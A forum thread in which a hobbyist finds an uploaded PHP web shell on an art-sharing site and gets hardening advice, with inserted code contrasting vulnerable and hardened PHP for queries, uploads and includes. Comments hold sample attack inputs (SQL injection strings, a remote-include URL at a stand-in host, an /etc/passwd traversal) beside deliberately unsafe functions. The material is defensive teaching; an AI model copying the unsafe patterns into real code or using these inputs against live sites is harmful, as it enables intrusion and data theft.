fx29 shell script

Somehow someone was able to upload a shell script called fx29.php to my site’s root directory. Once there, this script can be run from a browser and gives complete access to my site including my database. I don’t know what their goal was as all they did was get into my index file and say they hadn’t done more than break in and were warning me I had security problems. They made a suggestion that I pass something between pages using session variables to protect my pages. Thanks, but I’d just as soon be left alone, though maybe the warning will lead to my understanding security better. I don’t know what anyone could gain from getting into our site. It just exists to share artwork done by my partner, my friends and me.

I can’t figure out how they managed to upload it, though I suspect it may have been through some administration scripts I have written to allow the upload of images of artwork to our site. I have tried to implement various kinds of security in my scripting, though I must say, it is not a simple thing to figure out, especially since I need to feed a lot of info from page to page using gets, which seems to provide a significant point of intro. I am told there are vulnerabilities in the file upload process as well, a lot beyond my understanding.

I have purchased a couple of ebooks on php security to see where I can tighten things up. The explanations in the books are sometimes a bit abstract and a challenge to apply as they assume a bit more facility with php than my intermediate level skill. I have been coding for a number of years and am getting pretty good at it, though I just do it casually, so there are gaps of even as much as 6 months between when I sit down with it and there are always new things I have to catch up on and old things I need to refresh on. Security is still a challenge for me, obviously.

Can anyone recommend a good resource that provides practical information about securing a site at a level of a coder like myself? Or even any direct advice from someone with more experience than me.

Thanks,

–Kenoli

Just in case you haven’t already done it. Change all your access details - ftp, control panel, db - everything. If that file contains all your access details, it’s pretty safe to say that your site has been hacked. If your site happens to be wordpress based, install wordfence and wangguard plugins - I’ve found them both very useful.

[afterthought]
You might also take a look at this site’s security forum which is where this thread probably should be.

Thanks. I’m not using wordpress. I built the site from scratch with just php/mysql.

I didn’t realize there was a security forum. I should have checked before posting the question. I will go there.

–Kenoli

I posted this request on the php forum not realizing there was a security forum and someone suggested I post it here.

My site is one I programmed from scratch so it is not connected wordpress or any other cms that I am told provide some kinds of security for their sites.

Thanks,

–Kenoli

Hi Kenoli,

If you ever post in the wrong forum you can ask an advisor to move a thread, just click on the red flag (bottom left) and request a move. I’ve moved your thread to this security forum.

Depending on the scope of your site this could be a lot of work, but here is a list of suggestions to tighten up the security:

  1. If you manage the server then harden PHP (see “Security Tips For Hardening PHP & MySQL”).
  2. If you have access to the firewall then make sure you have open only the minimum ports that you need for access to the website. There should not be any NAT(ed) public ports for your database if it runs in the same private network or server where the site runs.
  3. Review each area where data can be input into your application. This includes $_POST, $_GET, file uploads, AJAX, and executed shell scripts. To learn more about this you may review the www.owasp.org cheat sheets or read Chris Shiflett’s blog at http://shiflett.org/articles (it may be older but is still very relevant). Chris has well written and easier to understand methods of presenting these security ideas.
  4. If it is a shared server then you need to talk to your host, as an attack can come from any busted site on the shared host. Ask if they are aware of any other sites being hacked on this server and ask to review the web logs or for them to take a look.

One positive sign is that you are not using a CMS and it is your own rolled solution, as plugins and modules in these environments can often add security bugs.

Hope this helps
Steve
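The third item on Steve’s list, reviewing every place data enters the application, is the one that matters most for a site that, as Kenoli describes, carries a lot of information from page to page in GET parameters and has hand-written admin scripts. The block below is an added example written for this thread; it is not code from Kenoli’s site or from Steve. The table and column names (artworks, id, title, path), the form field names and the PHP 7.3+ session cookie options are assumptions. It puts a GET parameter dropped straight into SQL next to the validated, prepared-statement version, and shows an admin gate based on a session flag rather than anything passed in the URL, which is the kind of session-variable protection the intruder’s note hinted at.

```php
<?php
// Added example for this thread, not the site's own code. Table/column names,
// form field names and the admin hash location are assumed for illustration.
declare(strict_types=1);

// Cookie flags before session_start(): not readable by scripts, HTTPS only,
// not sent on cross-site requests. (Array form needs PHP 7.3 or newer.)
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// --- Vulnerable pattern: the GET value becomes part of the SQL text. ---
// gallery.php?id=1 OR 1=1 changes the query; with UNION the attacker can
// read any table the site's DB user can see, which is what a shell like
// fx29.php gets you anyway, but here no upload is needed.
function show_artwork_unsafe(mysqli $db): void
{
    $id  = $_GET['id'];                       // unvalidated, unescaped
    $res = $db->query("SELECT title, path FROM artworks WHERE id = $id");
    $row = $res ? $res->fetch_assoc() : null;
    echo $row ? "<h1>{$row['title']}</h1>" : 'not found';   // also unescaped
}

// --- Hardened: validate the type first, then bind the value. ---
function artwork_id_from_get(): int
{
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer,
    // so "1 OR 1=1" and "1; DROP TABLE artworks" never reach the query.
    $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('bad artwork id');
    }
    return $id;
}

function show_artwork(mysqli $db, int $id): void
{
    // The value is bound as an integer, never concatenated into SQL.
    $stmt = $db->prepare('SELECT title, path FROM artworks WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null) {
        http_response_code(404);
        exit('not found');
    }
    // Escape on output so a title containing <script> stays inert.
    echo '<h1>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . '</h1>';
}

// --- Admin gate for the upload/admin scripts. ---
// The flag lives server-side in the session; nothing in the URL grants it.
function require_admin(): void
{
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('login required');
    }
}

// Called from the login form handler. $storedHash comes from
// password_hash() at account setup, never a plaintext password.
function admin_login(string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    session_regenerate_id(true);      // new id after privilege change
    $_SESSION['is_admin'] = true;
    return true;
}

// Every admin script starts with this line, before doing any work:
// require_admin();
```

Every admin and upload script gets require_admin() as its first statement, before it reads $_FILES or $_POST; checking only on the form page and not on the script that processes the form is the usual gap. The prepared-statement pattern applies to every query that takes a value from $_GET, $_POST or a cookie, not just the one shown.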

Steve – These are great ideas. I look forward to digging into the resources. I will check with my web host. I think they are shared servers, though when I spoke to them about the situation, they didn’t raise that issue, simply assumed it was a breach in my security and not their responsibility.

I’ll let you know how things turn out.

–Kenoli

They can gain hosting for any number of illegal or immoral uses in which they would want to remain anonymous. Phishing sites, spamming, pirated software and media, anonymous proxies for other scams…

This would be a likely attack location. Any time I have a look through the php forum at people’s file upload issues, the majority of code I see isn’t fully secure. If you want you can post up a section of the code relating to processing uploads and we can take a look to see if there’s anything obviously amiss.

Great! I will do that after I take a look at it. I have been thinking about this and realize that this is one of the reasons uploaded files are first loaded into a temporary directory. It should give me a couple of places to check to see where they are being uploaded to. My script does currently check to see if the uploaded file is an image file, though I am not sure if it does this by simply checking the extension or by some more secure method.

–Kenoli
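Kenoli’s question above, whether the upload script checks the extension or the actual content, is the crux. The block below is an added example for this thread, not the script Kenoli has or any code posted here. It shows the extension-only check beside a handler that validates the bytes PHP actually received, stores the file under a random name with an extension chosen by the server, and writes it to a directory that the web server should not execute scripts from. The upload directory path, the form field name and the size limit are assumptions.

```php
<?php
// Added example for this thread, not Kenoli's upload script. UPLOAD_DIR,
// the field name "artwork" and MAX_BYTES are assumed values.
declare(strict_types=1);

// Weak check: only looks at the name the browser sent. The client chooses
// that name, so "fx29.php" renamed to "fx29.jpg" passes, and on servers that
// map multiple extensions "shell.php.jpg" may still run as PHP.
function looks_like_image_by_name(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true);
}

const UPLOAD_DIR = '/var/www/artwork-uploads';   // outside the document root
const MAX_BYTES  = 5 * 1024 * 1024;
// Content types we accept, mapped to the extension WE will write.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate $_FILES[$field] and store it. Returns the stored path or throws.
 */
function store_uploaded_image(string $field): string
{
    $f = $_FILES[$field] ?? null;
    if ($f === null || $f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload missing or failed');
    }
    if ($f['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only touch a file PHP itself received through this POST request.
    if (!is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Sniff the real type from the file's magic bytes. $f['type'] and
    // $f['name'] both come from the client and are ignored on purpose.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($f['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('rejected content type: ' . (string) $mime);
    }
    // Second opinion: it must also decode as an image of that same type.
    $info = @getimagesize($f['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('not a valid image');
    }
    // Never reuse the client's name. Random name, server-chosen extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        throw new RuntimeException('could not move file');
    }
    chmod($dest, 0644);      // readable by the web server, never executable
    return $dest;
}

// Usage inside the admin script, after the admin session check:
// try { $stored = store_uploaded_image('artwork'); }
// catch (RuntimeException $e) { http_response_code(400); exit($e->getMessage()); }
```

Two caveats a practitioner would add. First, content sniffing is necessary but not sufficient: a file can be a valid JPEG and still carry PHP code in a comment segment, which is why the random name, the server-chosen extension and a directory PHP will not execute from (outside the document root, or with PHP execution turned off for that directory in the web server config) are the controls that actually stop an uploaded shell from running. Second, the images then have to be served either by a web server alias onto that directory or by a small read-only script, never by including them.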

It could also be from a remote file inclusion vulnerability (RFI). If you are sending params like file=filename.jpg, make sure you can’t load files from URLs.
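The file=filename.jpg pattern mentioned above covers two related bugs: a parameter that decides which file gets included (remote or local file inclusion) and a parameter that decides which file gets read back to the browser (path traversal). The block below is an added example for this thread, not code from the site under discussion, showing both weak forms beside versions that allow-list the value or pin the resolved path inside one directory. The directory paths, page names and image naming rule are assumptions.

```php
<?php
// Added example for this thread, not the site's own code. The page map,
// the pages/ and images/ directories and the file-name pattern are assumed.
declare(strict_types=1);

// Vulnerable include: the request decides what PHP executes.
//   ?page=http://evil.example/x.txt   runs remote code if allow_url_include=On
//   ?page=../uploads/fx29             runs a locally uploaded file
function render_page_unsafe(): void
{
    include $_GET['page'] . '.php';
}

// Hardened include: the parameter is only a key into a fixed map of
// files the site author wrote. Nothing else can be included.
const PAGES = [
    'home'    => 'home.php',
    'gallery' => 'gallery.php',
    'about'   => 'about.php',
];

function render_page(): void
{
    $key = $_GET['page'] ?? 'home';
    if (!is_string($key) || !isset(PAGES[$key])) {
        http_response_code(404);
        exit('no such page');
    }
    include __DIR__ . '/pages/' . PAGES[$key];
}

// Vulnerable file read: ?file=../../../../etc/passwd walks out of images/.
function send_image_unsafe(): void
{
    readfile('/var/www/site/images/' . $_GET['file']);
}

const IMAGE_DIR = '/var/www/site/images';

// Hardened file read: strip any directory part, require a plain name,
// then confirm the resolved path really sits under IMAGE_DIR.
function send_image(string $requested): void
{
    $name = basename($requested);
    if (!preg_match('/^[A-Za-z0-9_-]+\.(jpg|jpeg|png|gif)$/', $name)) {
        http_response_code(400);
        exit('bad file name');
    }
    $base = realpath(IMAGE_DIR);
    $path = realpath(IMAGE_DIR . '/' . $name);   // collapses ../ and symlinks
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        http_response_code(404);
        exit('not found');
    }
    header('Content-Type: ' . mime_content_type($path));
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}

// Server side, in php.ini (these are real directives; Off is the default
// for allow_url_include in current PHP and is worth confirming):
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; unless the site genuinely fetches remote URLs
```

With include calls, the allow-list is the whole fix; there is no safe way to sanitize an arbitrary string into an include path. With reads, basename plus the realpath prefix check closes traversal, and confirming allow_url_include is Off on the server means that even a remaining include bug cannot pull code from a URL.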